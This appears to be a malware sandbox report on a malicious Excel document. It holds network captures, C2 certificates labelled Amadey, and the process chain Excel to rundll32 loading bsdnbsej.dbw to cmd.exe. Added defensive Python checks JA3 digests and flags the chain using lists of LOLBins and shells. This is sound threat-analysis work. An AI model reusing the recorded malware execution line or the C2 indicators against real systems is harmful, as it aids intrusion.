                                                                   May 4, 2021 01:13:18.071845055 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.071923971 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.073024035 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.073043108 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.073112965 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.074256897 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.074280024 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.074336052 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.074424028 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.075501919 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.075526953 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.075586081 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.075644970 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.076770067 CEST  443          49709      104.21.64.132  192.168.2.4

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
May 4, 2021 01:13:00.727587938 CEST  65195        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:00.786514997 CEST  53           65195      8.8.8.8      192.168.2.4
May 4, 2021 01:13:17.447101116 CEST  59042        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:17.509002924 CEST  53           59042      8.8.8.8      192.168.2.4
May 4, 2021 01:13:20.502229929 CEST  56483        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:20.553493977 CEST  53           56483      8.8.8.8      192.168.2.4
May 4, 2021 01:13:24.910193920 CEST  51025        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:24.959079981 CEST  53           51025      8.8.8.8      192.168.2.4
May 4, 2021 01:13:26.321924925 CEST  61516        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:26.374690056 CEST  53           61516      8.8.8.8      192.168.2.4
May 4, 2021 01:13:27.635643005 CEST  49182        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:27.692507982 CEST  53           49182      8.8.8.8      192.168.2.4
May 4, 2021 01:13:28.637053013 CEST  59920        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:28.685787916 CEST  53           59920      8.8.8.8      192.168.2.4
May 4, 2021 01:13:30.125972033 CEST  57458        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:30.178047895 CEST  53           57458      8.8.8.8      192.168.2.4
May 4, 2021 01:13:31.222650051 CEST  50579        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:31.274199963 CEST  53           50579      8.8.8.8      192.168.2.4
May 4, 2021 01:13:32.235920906 CEST  51703        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:32.288701057 CEST  53           51703      8.8.8.8      192.168.2.4
May 4, 2021 01:13:33.330152035 CEST  65248        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:33.387725115 CEST  53           65248      8.8.8.8      192.168.2.4
May 4, 2021 01:13:34.458899021 CEST  53723        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:34.510404110 CEST  53           53723      8.8.8.8      192.168.2.4
May 4, 2021 01:13:36.028682947 CEST  64646        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:36.079252005 CEST  53           64646      8.8.8.8      192.168.2.4
May 4, 2021 01:13:37.086924076 CEST  65298        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:37.137885094 CEST  53           65298      8.8.8.8      192.168.2.4
May 4, 2021 01:13:38.326523066 CEST  59123        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:38.381735086 CEST  53           59123      8.8.8.8      192.168.2.4
May 4, 2021 01:13:39.429588079 CEST  54531        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:39.478370905 CEST  53           54531      8.8.8.8      192.168.2.4
May 4, 2021 01:13:40.586182117 CEST  49714        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:40.638150930 CEST  53           49714      8.8.8.8      192.168.2.4
May 4, 2021 01:13:41.945377111 CEST  58028        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:42.003473043 CEST  53           58028      8.8.8.8      192.168.2.4
May 4, 2021 01:13:43.052455902 CEST  53097        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:43.111682892 CEST  53           53097      8.8.8.8      192.168.2.4
May 4, 2021 01:13:44.285271883 CEST  49257        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:44.335665941 CEST  53           49257      8.8.8.8      192.168.2.4
May 4, 2021 01:13:45.413512945 CEST  62389        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:45.463510990 CEST  53           62389      8.8.8.8      192.168.2.4
May 4, 2021 01:13:46.539376974 CEST  49910        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:46.591114998 CEST  53           49910      8.8.8.8      192.168.2.4
May 4, 2021 01:13:47.714199066 CEST  55854        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:47.765872002 CEST  53           55854      8.8.8.8      192.168.2.4
May 4, 2021 01:13:58.273379087 CEST  64549        53         192.168.2.4  8.8.8.8
May 4, 2021 01:13:58.331209898 CEST  53           64549      8.8.8.8      192.168.2.4
May 4, 2021 01:14:13.404748917 CEST  63153        53         192.168.2.4  8.8.8.8
May 4, 2021 01:14:13.455368042 CEST  53           63153      8.8.8.8      192.168.2.4
May 4, 2021 01:14:14.218183994 CEST  52991        53         192.168.2.4  8.8.8.8
May 4, 2021 01:14:14.219389915 CEST  53700        53         192.168.2.4  8.8.8.8
May 4, 2021 01:14:14.282449961 CEST  53           52991      8.8.8.8      192.168.2.4
May 4, 2021 01:14:14.284641027 CEST  53           53700      8.8.8.8      192.168.2.4

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name          Type            Class
May 4, 2021 01:13:17.447101116 CEST  192.168.2.4  8.8.8.8  0x2792    Standard query (0)  otusmail.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name          CName  Address        Type            Class
May 4, 2021 01:13:17.509002924 CEST  8.8.8.8    192.168.2.4  0x2792    No error (0)  otusmail.com         104.21.64.132  A (IP address)  IN (0x0001)
May 4, 2021 01:13:17.509002924 CEST  8.8.8.8    192.168.2.4  0x2792    No error (0)  otusmail.com         172.67.151.10  A (IP address)  IN (0x0001)

HTTPS Packets

Timestamp: May 4, 2021 01:13:17.651288033 CEST
Source IP: 104.21.64.132    Source Port: 443    Dest IP: 192.168.2.4    Dest Port: 49709
Certificate 1 (leaf)
  Subject:    CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US
  Issuer:     CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
  Not Before: Wed Apr 28 02:00:00 CEST 2021
  Not After:  Thu Apr 28 01:59:59 CEST 2022
Certificate 2 (intermediate)
  Subject:    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
  Issuer:     CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
  Not Before: Mon Jan 27 13:48:08 CET 2020
  Not After:  Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Timestamp: May 4, 2021 01:14:13.800282955 CEST
Source IP: 18.222.240.99    Source Port: 443    Dest IP: 192.168.2.4    Dest Port: 49735
Certificate 1 (self-signed: subject and issuer are identical)
  Subject:    CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
  Issuer:     CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
  Not Before: Thu Apr 29 09:28:05 CEST 2021
  Not After:  Fri Apr 29 09:28:05 CEST 2022
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 51c64c77e60f3980eea90869b68c58a8

Timestamp: May 4, 2021 01:14:24.715645075 CEST
Source IP: 54.163.9.216    Source Port: 443    Dest IP: 192.168.2.4    Dest Port: 49739
Certificate 1 (self-signed: subject and issuer are identical)
  Subject:    CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
  Issuer:     CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
  Not Before: Thu Apr 29 09:18:48 CEST 2021
  Not After:  Fri Apr 29 09:18:48 CEST 2022
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 51c64c77e60f3980eea90869b68c58a8
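The JA3 strings and digests in the HTTPS table can be cross-checked, and the two client hellos compared, with the following added example. It is not part of the Joe Sandbox report: it re-derives the digest the report prints (a JA3 digest is the MD5 of the JA3 string), parses the five JA3 fields, and applies the subject-equals-issuer heuristic for self-signed certificates. REPORT_TLS is copied from the table above; the function names and the extension-name map (standard IANA TLS extension numbers) are this example's own.

```python
"""Added example, not part of the Joe Sandbox report: cross-check the JA3
digests and certificate fields shown in the HTTPS Packets table above.
REPORT_TLS is copied from that table; the helpers are this example's own."""
import hashlib

REPORT_TLS = [
    {   # 104.21.64.132:443, the address DNS returned for otusmail.com
        "server": "104.21.64.132:443",
        "subject": 'CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US',
        "issuer": 'CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US',
        "ja3": "771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0",
        "ja3_digest": "37f463bf4616ecd445d4a1937da06e19",
    },
    {   # 18.222.240.99:443, no DNS query for it appears in the report
        "server": "18.222.240.99:443",
        "subject": "CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT",
        "issuer": "CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT",
        "ja3": "771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,0",
        "ja3_digest": "51c64c77e60f3980eea90869b68c58a8",
    },
    {   # 54.163.9.216:443, same certificate DN but a different validity window
        "server": "54.163.9.216:443",
        "subject": "CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT",
        "issuer": "CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT",
        "ja3": "771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,0",
        "ja3_digest": "51c64c77e60f3980eea90869b68c58a8",
    },
]

# IANA TLS extension numbers for the ones that occur in these hellos.
TLS_EXTENSION_NAMES = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
                       13: "signature_algorithms", 23: "extended_master_secret",
                       35: "session_ticket", 65281: "renegotiation_info"}


def ja3_digest(ja3):
    """A JA3 digest is the MD5 of the comma-separated JA3 string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def parse_ja3(ja3):
    """Split 'version,ciphers,extensions,curves,point_formats' into int lists."""
    version, ciphers, exts, curves, fmts = ja3.split(",")
    ints = lambda field: [int(x) for x in field.split("-")] if field else []
    return {"version": int(version), "ciphers": ints(ciphers), "extensions": ints(exts),
            "curves": ints(curves), "point_formats": ints(fmts)}


def digest_matches(entry):
    return ja3_digest(entry["ja3"]) == entry["ja3_digest"].lower()


def is_self_signed(entry):
    """DN-level heuristic only: a real check verifies the signature with the
    certificate's own public key, which the report does not give us."""
    return entry["subject"] == entry["issuer"]


def extension_diff(ja3_a, ja3_b):
    """Return (extensions only in a, extensions only in b)."""
    a = set(parse_ja3(ja3_a)["extensions"])
    b = set(parse_ja3(ja3_b)["extensions"])
    return a - b, b - a


def triage(entries):
    """Human-readable findings for each connection in the table."""
    findings = []
    for e in entries:
        if not digest_matches(e):
            findings.append(f"{e['server']}: JA3 digest does not match the JA3 string")
        if is_self_signed(e):
            findings.append(f"{e['server']}: self-signed certificate ({e['subject']})")
        if 0 not in parse_ja3(e["ja3"])["extensions"]:
            findings.append(f"{e['server']}: client hello carries no server_name (SNI), "
                            "consistent with a connection made to a bare IP")
    return findings


if __name__ == "__main__":
    for line in triage(REPORT_TLS):
        print(line)
    only_first, only_second = extension_diff(REPORT_TLS[0]["ja3"], REPORT_TLS[1]["ja3"])
    print("extensions only in the otusmail.com hello:",
          [TLS_EXTENSION_NAMES.get(x, x) for x in only_first])
```

The only difference between the two JA3 strings is extension 0 (server_name): the connection to 104.21.64.132 followed a DNS lookup of otusmail.com and sent an SNI, while the connections to 18.222.240.99 and 54.163.9.216 did not, and no DNS query for either address appears in the DNS tables above. That is why the same Windows TLS stack produces two different digests here, and why the second digest alone is a weak indicator: it fingerprints the client's TLS library plus "no SNI", not the malware.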

Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 01:13:11
Start date: 04/05/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x60000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 01:13:17
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\bsdnbsej.dbw,PluginInit
Imagebase: 0xe80000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 01:14:22
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\cmd.exe
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
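The process list above (EXCEL.EXE, then rundll32 loading `..\bsdnbsej.dbw` by relative path with the export `PluginInit`, then cmd.exe) is the chain a process-creation rule should catch. The following added example is not part of the report; it runs four checks over constructed process-creation records that mirror these entries: an Office parent spawning a LOLBin, rundll32 asked to load a module whose extension is not a DLL, rundll32 given a relative module path, and rundll32 spawning a shell. The report does not state the parent of cmd.exe, so it is assumed to be the rundll32 process here; the PIDs, the benign Explorer/shell32 control event, the allow-list of rundll32 extensions and all function names are this example's own.

```python
r"""Added example, not from the Joe Sandbox report: flag the
EXCEL.EXE -> rundll32 ..\bsdnbsej.dbw,PluginInit -> cmd.exe chain in
process-creation telemetry. SAMPLE_EVENTS is constructed to mirror the
System Behavior entries above; PIDs and the parent of cmd.exe are assumptions."""
import ntpath
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"rundll32.exe", "cmd.exe", "powershell.exe", "mshta.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Extensions rundll32 is normally asked to load (assumed allow-list); anything
# else, such as the .dbw here, is worth a look.
RUNDLL32_NORMAL_EXT = {".dll", ".cpl", ".ocx", ".ax", ".drv"}


def image_name(path):
    return ntpath.basename(path).lower()


def parse_rundll32(cmdline):
    """Split 'rundll32[.exe] <module>,<entrypoint> [args]' into (module, entrypoint).
    rundll32 splits its first argument at the first comma; quoted module paths
    containing spaces are not handled by this simple tokenizer."""
    parts = cmdline.strip().split(None, 2)
    if len(parts) < 2:
        return None, None
    module, _, entry = parts[1].strip('"').partition(",")
    return module, (entry or None)


def is_relative_path(path):
    """No drive letter and no UNC prefix: the module is resolved against the
    current directory of the parent (here, wherever Excel dropped it)."""
    drive, _ = ntpath.splitdrive(path)
    return drive == ""


def triage(events):
    """Return {pid: sorted rule names} for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        rules = []
        child = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""
        if parent_name in OFFICE_APPS and child in LOLBINS:
            rules.append("office_spawns_lolbin")
        if child == "rundll32.exe":
            module, _entry = parse_rundll32(e.cmdline)
            if module:
                if ntpath.splitext(module)[1].lower() not in RUNDLL32_NORMAL_EXT:
                    rules.append("rundll32_nondll_module")
                if is_relative_path(module):
                    rules.append("rundll32_relative_module")
        if parent_name == "rundll32.exe" and child in SHELLS:
            rules.append("rundll32_spawns_shell")
        if rules:
            hits[e.pid] = sorted(rules)
    return hits


# Constructed records mirroring the report (PIDs invented; cmd.exe's parent assumed).
SAMPLE_EVENTS = [
    ProcEvent(1000, 0, r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
              r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding"),
    ProcEvent(1001, 1000, r"C:\Windows\SysWOW64\rundll32.exe",
              r"rundll32 ..\bsdnbsej.dbw,PluginInit"),
    ProcEvent(1002, 1001, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\cmd.exe"),
    # Benign control (constructed): a Control Panel applet launched from Explorer.
    ProcEvent(2000, 0, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(2001, 2000, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Each of the three rundll32 checks fires independently, which matters when only one of them survives an attacker's tweak: renaming the payload to .dll defeats the extension check but not the relative-path or Office-parent checks, and hollowing a different host process (the report flags process hollowing) removes rundll32 from the chain entirely, so the Office-parent rule is the one to keep broad.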

Disassembly

Code Analysis
